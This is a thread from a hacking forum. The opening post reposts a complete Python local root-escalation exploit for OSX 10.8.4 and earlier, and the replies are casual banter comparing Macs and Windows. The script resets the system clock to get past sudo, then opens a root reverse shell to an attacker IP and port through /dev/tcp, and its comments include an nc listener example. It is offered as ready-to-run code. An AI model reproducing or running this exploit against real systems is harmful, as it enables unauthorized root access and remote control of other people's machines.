+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: I will scream at the next person who tells me Macs are secure! (/Thread-I-will-scream-at-the-next-person-who-tells-me-Macs-are-secure)
I will scream at the next person who tells me Macs are secure! - Adorapuff - 10-19-2013
Literally at least 10% of macs are still on 10.8.4 or below.
Next time some apple lover tells you Macs are secure, show them this and briefly explain it, not like half of you will understand it anyway.
Code:
#!/usr/bin/python
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
print """
###############################################################
#
# OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)RE: I will scream at the next person who tells me Macs are secure! - Feat - 10-19-2013
I don't understand this at all, but I never believe that bullshit. I honestly dislike macs with a fury.
RE: I will scream at the next person who tells me Macs are secure! - Adorapuff - 10-19-2013
(10-19-2013, 02:11 AM)Feat Wrote: I don't understand this at all, but I never believe that bullshit. I honestly dislike macs with a fury.I have nothing against Macs, just the fuckers who praise them like idols.
RE: I will scream at the next person who tells me Macs are secure! - Feat - 10-19-2013
(10-19-2013, 02:12 AM)Putin Wrote: I have nothing against Macs, just the fuckers who praise them like idols.
So you mean more than half of my school who probably only found out about macs in 3rd grade? I've owned a Windows computer since I was 6 and a half.
RE: I will scream at the next person who tells me Macs are secure! - Adorapuff - 10-19-2013
(10-19-2013, 02:13 AM)Feat Wrote: So you mean more than half of my school who probably only found out about macs in 3rd grade? I've owned a Windows computer since I was 6 and a half.I too got a windows machine at 6. I spilt water on the keyboard at 8, and I had to use a USB mouse
RE: I will scream at the next person who tells me Macs are secure! - Feat - 10-19-2013
(10-19-2013, 02:14 AM)Putin Wrote: I too got a windows machine at 6. I spilt water on the keyboard at 8, and I had to use a USB mouse
My keyboards have been put through hell and back, still going strong doe.
RE: I will scream at the next person who tells me Macs are secure! - Silky - 10-19-2013
That's funny I just upgraded my Mac and was vulnerable. Although my Snort is so jacked it wouldn't last long anyways.
RE: I will scream at the next person who tells me Macs are secure! - w00t - 10-19-2013
OMG MACS HACKPROOF DONT LIE LOOSER MACS ARE PRO AND NO VIRUSES.
RE: I will scream at the next person who tells me Macs are secure! - Nil - 10-19-2013
Not going to pretend that I understand the code, but I do understand your frustration with Apple users who think they're invincible. Simply, not many people care to spread on Macs, for now.
RE: I will scream at the next person who tells me Macs are secure! - Fallen - 10-19-2013
Macs are not secured. I'm not sure that was still the conception.